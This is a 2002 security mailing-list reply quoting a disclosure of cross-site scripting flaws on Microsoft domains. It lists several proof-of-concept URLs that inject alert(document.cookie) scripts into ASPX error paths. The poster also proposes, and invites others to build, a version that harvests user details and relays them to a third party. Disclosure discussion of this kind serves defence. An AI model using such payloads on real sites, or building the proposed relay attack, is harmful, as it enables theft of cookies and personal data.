RE: MSN Messenger reveals your name to websites (and can reveal email addresses too)

From: Bryan Allerdice (bryan_allerdiceat_private)
Date: Tue Feb 05 2002 - 18:19:39 PST

    An email was posted to a security mailing list today or yesterday by
    Johannes Westerink concerning Cross Site Scripting on Microsoft domains...

    <snip>

    Examples how it can be exploited:

    Cross Site Scripting:
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~
    http://ulogin.bcentral.com/~/>alert(document.cookie)</script>.aspx?as
    pxerrorpath=null
    http://www.msn.com/~/>alert(document.cookie)</script>.aspx?aspxerrorp
    ath=null
    http://my.msn.com/~/>alert(document.cookie)</script>.aspx?aspxerrorpa
    th=null
    http://dotnet.microsoft.com/>alert(document.cookie)</script>.aspx
    http://terraserver.microsoft.net/>alert(document.cookie)</script>.asp
    http://support.microsoft.com/~/>alert(document.cookie)</script>.aspx?
    aspxerrorpath=null
    http://office.microsoft.com/~/>alert(document.cookie)</script>.aspx?a
    spxerrorpath=null
    http://communities.microsoft.com/~/>alert(document.cookie)</script>.a
    spx
    http://uddi.microsoft.com/~/>alert(document.cookie)</script>.aspx

    <snip>

    Since Microsoft domains are trusted, and get email address details using
    Richard's code, couldn't a CSS version be made which grabs full user
    details, and relays them to an untrusted third party?

    I'm busy working at the moment, but I am interested if it can be done. How
    about someone out there with more time on their hands than me, give the CSS
    idea a go and report back to the list.

    I'm sure spammers will love this exploit... unfortunately. Thanks Microsoft.

    Poor XP users.

    BRYAN